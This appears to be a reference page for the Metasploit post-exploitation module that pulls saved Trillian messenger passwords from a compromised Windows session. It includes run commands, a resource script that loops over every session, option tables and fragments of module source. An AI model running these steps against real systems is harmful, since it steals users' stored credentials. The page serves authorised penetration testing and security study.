Windows Gather Trillian Password Extractor - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/trillian metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Trillian Password Extractor
Module: post/windows/gather/credentials/trillian
Source code: modules/post/windows/gather/credentials/trillian.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts account password from Trillian & Trillian Astra v4.x-5.x instant messenger.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/trillian

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/trillian
msf post(trillian) > show options
    ... show and set options ...
msf post(trillian) > set SESSION session-id
msf post(trillian) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/trillian")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/trillian post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/trillian

msf6 post(windows/gather/credentials/trillian) > show info

       Name: Windows Gather Trillian Password Extractor
     Module: post/windows/gather/credentials/trillian
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Sil3ntDre4m <[email protected]>
  Unknown

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts account password from Trillian & Trillian Astra 
  v4.x-5.x instant messenger.

Module Options


This is a complete list of options available in the windows/gather/credentials/trillian post exploitation module:

msf6 post(windows/gather/credentials/trillian) > show options

Module options (post/windows/gather/credentials/trillian):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/trillian post exploitation module:

msf6 post(windows/gather/credentials/trillian) > show advanced

Module advanced options (post/windows/gather/credentials/trillian):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/trillian module can do:

msf6 post(windows/gather/credentials/trillian) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/trillian post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/trillian) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to parse file


Here is a relevant code snippet related to the "Unable to parse file" error message:

46:	      config = client.fs.file.new(file, 'r')
47:	      parse = config.read
48:	      ini = Rex::Parser::Ini.from_s(parse)
49:	
50:	      if ini == {}
51:	        print_error("Unable to parse file")
52:	        return
53:	      end
54:	
55:	      creds = Rex::Text::Table.new(
56:	        'Header' => 'Trillian versions 4-5 Instant Messenger Credentials',

An error has occurred: <E.TO_S>


Here is a relevant code snippet related to the "An error has occurred: <E.TO_S>" error message:

81:	        'trillian_user_creds.csv',
82:	        'Trillian Instant Messenger User Credentials'
83:	      )
84:	      print_good("Trillian Instant Messenger user credentials saved in: #{path}")
85:	    rescue ::Exception => e
86:	      print_error("An error has occurred: #{e.to_s}")
87:	    end
88:	  end
89:	
90:	  def decrypt(epass)
91:	    magicarr = [

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Sil3ntDre4m <sil3ntdre4m[at]gmail.com>
  • Unknown

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.